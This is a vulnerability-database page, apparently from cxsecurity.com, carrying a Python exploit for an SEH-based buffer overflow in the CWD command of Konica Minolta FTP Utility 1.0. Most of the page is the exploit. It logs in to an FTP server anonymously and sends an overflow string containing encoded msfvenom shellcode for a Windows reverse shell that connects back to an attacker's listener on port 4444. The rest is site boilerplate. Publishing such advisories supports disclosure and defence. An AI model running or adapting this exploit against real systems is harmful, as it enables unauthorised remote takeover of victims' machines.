Konica Minolta FTP Utility 1.0 SEH Buffer Overflow

2016.06.01
Credit: Mandar Jadhav
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Konica Minolta FTP Utility - CWD Command SEH Based Buffer Overflow Vulnerability # Date: 24/5/2016 # Exploit Author: Mandar # Vendor Homepage: http://www.konicaminolta.hk/hk/en-us/download-driver-dl-utilities.php # Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Version: Konica Minolta FTP Utility v1.0 # Tested on: Windows XP SP3, Windows 7 SP1 64bits, Windows 8.1 64bits, Windows 10 pro # CVE : CVE-2015-7768 # Listen for a reverse netcat connection on port 4444 import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) junk = "\x41" * 1037 #offset to EIP #msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python (replace LHOST with an attacker's IP) buf = "" buf += "\xdb\xd2\xbf\xcc\xee\x99\xa8\xd9\x74\x24\xf4\x5d\x2b" buf += "\xc9\xb1\x5f\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x2e" buf += "\x1b\x22\x04\x1b\xad\xcc\x8f\xb3\xf7\x9b\x0b\xc7\x56" buf += "\x4d\x9d\x96\x3f\xbc\x43\xcd\x3c\x50\x87\xee\x1c\xbc" buf += "\x9a\xa9\xc8\x34\x1a\x9c\xbe\xb0\x57\x29\xe3\xb4\x80" buf += "\x3a\x80\x08\xee\x19\xf4\xd3\xc7\x43\x35\x0e\xb3\x85" buf += "\x74\x16\x36\x51\xc5\xa5\xe0\x5b\xf0\x29\x11\x62\x83" buf += "\x56\x98\x21\xea\x69\x23\x10\x7c\x65\x02\x77\x70\xdc" buf += "\x5a\xd9\x6e\xc5\x55\x07\x15\xba\xb4\x10\xf5\xee\x73" buf += "\xbc\x17\x68\xe3\x78\x89\x60\x95\x1c\x62\xba\x1f\x60" buf += "\xd8\x65\x41\xf7\x0c\x30\x56\x08\x79\xd2\x32\x0e\x03" buf += "\x56\xbf\x9e\xbf\xf7\xba\xe2\xaa\x96\x9d\x1d\x62\xdd" buf += "\xa7\xbb\x40\x53\xa2\x0f\xd8\x25\x4a\x4e\x4d\x38\xa9" buf += "\xb6\xb0\x48\x51\xba\x5e\x6d\x23\x80\xd4\x45\x61\x14" buf += "\x82\xc4\x6d\x69\x93\x19\x69\xe9\x8c\x24\x01\xb5\x68" buf += "\xc4\xfe\x95\x69\x0c\xa1\x71\xd2\x5d\xb8\x90\x06\x31" buf += "\xfa\xfe\xf8\x61\x35\x46\xc8\xcb\xf8\x57\xac\x85\x06" buf += "\x2b\x6d\x02\xb2\x4b\xca\x0e\x87\xaf\x7d\x43\x6b\x1c" buf += "\x03\x42\x13\xfe\x16\x9c\x70\xf2\xaf\x34\x6e\x42\x2b" buf += "\xba\xf2\x62\xdc\x9a\x55\x4a\x46\x08\x04\x7a\x8e\x26" buf += "\x95\xa8\x72\x8e\x8c\x83\xef\xcd\xb6\x10\x91\xfe\xda" buf += "\x3a\x15\xba\x7c\xef\x24\x1c\x9d\xb7\x57\xe9\x60\x7f" buf += "\x06\xd3\xf6\x7b\x85\x7b\xd3\xb2\x8c\x30\x85\xb7\x56" buf += "\x41\x7f\x6c\xab\x01\x7a\x1b\x77\xcf\xd5\x0c\x85\xce" buf += "\xb6\x6f\x5f\xfb\xc7\x43\xc8\x13\xfe\xae\xcc\xea\xe6" buf += "\x40\x61\x2c\x75\xdb\x9a\x6b\x03\x80\xc1\x69\xc8\x5f" buf += "\x16\x31\x16\xf4\x50\x45\x99\xa9\xc5\x7f\xa0\x64\x59" buf += "\xb3\x95\xe1\xb7\xa6\xe0\x36\x2a\xe3\xc7\xcb\x09\xb0" buf += "\x84\x37\x67\xa2\x91\xbd\xb8\x38\x26\x68\xa8\x67\x81" buf += "\x5e\x89\xf8\xf3\x30\xd2\xc2\x37\x25\x2d\x99\xf2\xad" buf += "\x34\xdf\x21\x2b\x43\xcd\x18\xa0\x95\x9e\xa9\xe4\x44" buf += "\xb0\xcd" nseh = "\xeb\x10\x90\x90" seh = "\xb0\x63\x20\x12" exploit = junk + nseh + seh + "\x90" *20 + buf + "\x42" * 500 print "sending" s.connect(('x.x.x.x',21)) # Insert target IP data = s.recv(1024) s.send('USER anonymous' + '\r\n') data = s.recv(1024) s.send('PASS anonymous' + '\r\n') data = s.recv(1024) s.send('CWD ' +exploit+ '\r\n') s.close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top